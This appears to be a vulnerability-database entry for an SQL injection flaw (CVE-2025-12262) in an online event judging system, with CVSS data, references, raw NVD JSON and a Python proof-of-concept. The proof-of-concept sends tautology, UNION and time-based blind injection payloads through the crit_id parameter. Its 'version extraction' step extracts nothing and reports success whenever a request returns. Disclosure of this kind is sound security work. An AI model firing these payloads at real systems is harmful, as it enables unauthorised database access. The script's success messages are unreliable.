CVE-2025-12262

Description

A vulnerability was determined in code-projects Online Event Judging System 1.0. This impacts an unknown function of the file /edit_criteria.php. Executing manipulation of the argument crit_id can lead to sql injection. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:carmelo:online_event_judging_system:1.0:*:*:*:*:*:*:* - VULNERABLE

code-projects Online Event Judging System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-12262 SQL Injection PoC
# Target: code-projects Online Event Judging System 1.0
# File: /edit_criteria.php
# Parameter: crit_id

import requests
import sys

target_url = "http://target.com/edit_criteria.php"

# Basic SQL Injection test payload
payloads = [
    "1' OR '1'='1",
    "1' UNION SELECT 1,2,3-- -",
    "1' AND SLEEP(5)-- -",
    "1' AND 1=1-- -",
    "1' AND 1=2-- -"
]

def test_sql_injection():
    print("[*] Testing CVE-2025-12262 SQL Injection...")
    print(f"[*] Target: {target_url}")
    
    for i, payload in enumerate(payloads, 1):
        print(f"\n[*] Testing payload {i}: {payload}")
        
        params = {
            'crit_id': payload
        }
        
        try:
            response = requests.get(target_url, params=params, timeout=10)
            print(f"[+] Status Code: {response.status_code}")
            print(f"[+] Response Length: {len(response.text)}")
            
            # Check for SQL error indicators
            if 'sql' in response.text.lower() or 'error' in response.text.lower():
                print("[!] Potential SQL error detected!")
                
        except requests.exceptions.RequestException as e:
            print(f"[-] Request failed: {e}")

# Blind SQL Injection to extract database version
def extract_db_version():
    print("\n[*] Attempting to extract database version...")
    payload = "1' AND (SELECT CASE WHEN (1=1) THEN SLEEP(3) ELSE 0 END)-- -"
    params = {'crit_id': payload}
    
    try:
        response = requests.get(target_url, params=params, timeout=15)
        print("[+] Blind SQL injection confirmed!")
    except requests.exceptions.Timeout:
        print("[!] Time-based blind injection successful!")

if __name__ == "__main__":
    test_sql_injection()
    extract_db_version()
    print("\n[*] PoC testing complete")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12262
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12262
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12262/
[4] VulDB https://vuldb.com/cve/CVE-2025-12262
[5] https://code-projects.org/
[6] https://github.com/anyizilegong/cve/issues/1
[7] https://vuldb.com/?ctiid.329933
[8] https://vuldb.com/?id.329933
[9] https://vuldb.com/?submit.674056

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12262", "sourceIdentifier": "[email protected]", "published": "2025-10-27T11:15:38.810", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in code-projects Online Event Judging System 1.0. This impacts an unknown function of the file /edit_criteria.php. Executing manipulation of the argument crit_id can lead to sql injection. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:carmelo:online_event_judging_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "9FE35151-38A0-407C-A81B-14BA65BD9F8F"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/anyizilegong/cve/issues/1", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.329933", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.329933", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.674056", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}